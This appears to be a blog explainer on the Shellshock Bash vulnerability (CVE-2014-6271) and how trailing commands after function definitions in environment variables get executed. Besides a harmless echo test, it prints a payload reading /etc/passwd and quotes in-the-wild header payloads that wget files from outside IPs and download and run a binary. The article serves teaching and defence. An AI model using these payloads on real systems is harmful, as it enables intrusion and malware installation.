Shellshock refers to a series of vulnerabilities in the GNU Bash (Bourne Again SHell), a command-line shell widely used in Unix-like systems, including Linux and macOS. The primary vulnerability, tracked as CVE-2014–6271, was publicly disclosed on September 24, 2014, by researcher Stéphane Chazelas.
At its core, Bash is more than just a command interpreter — it’s often invoked by web servers (like Apache with CGI scripts), SSH, and DHCP clients to process environment variables. Shellshock exploits a flaw in how Bash handles these variables, specifically when they contain function definitions followed by trailing commands.
In simple terms: Bash doesn’t properly parse certain environment variables, allowing attackers to append malicious code that gets executed automatically. This isn’t just a theoretical issue; it affected millions of systems worldwide, from servers to embedded devices.
To understand the mechanics, let’s look at how Bash processes environment variables. Normally, you can define a function in an environment variable like this:
() { echo "This is a function"; }
But in vulnerable Bash versions (up to 4.3), if you add commands after the function definition, Bash executes them unexpectedly. The bug lies in the parser: it doesn’t stop after the function closes, so any trailing code runs as a command.
Press enter or click to view image in full size
Here’s a basic proof-of-concept (PoC) to demonstrate:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
() { :; }; echo ; /bin/bash -c "cat /etc/passwd"
- If the system is vulnerable, this will output “vulnerable” followed by “this is a test”.
- On a patched system, it just echoes “this is a test”.
In some cases, the exploit attempt is clearly visible within the host name HTTP header:
() { :; }; /bin/ping -c 3 109.235.51.42
() { :; }; /usr/bin/env wget hxxp://173.193.139.2/host
() { :; }; wget 37.187.225.119/a; wget 37.187.225.119/action.php > /var/www/
() { :;}; wget -O /tmp/syslogd hxxp://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /tmp/syslogd;
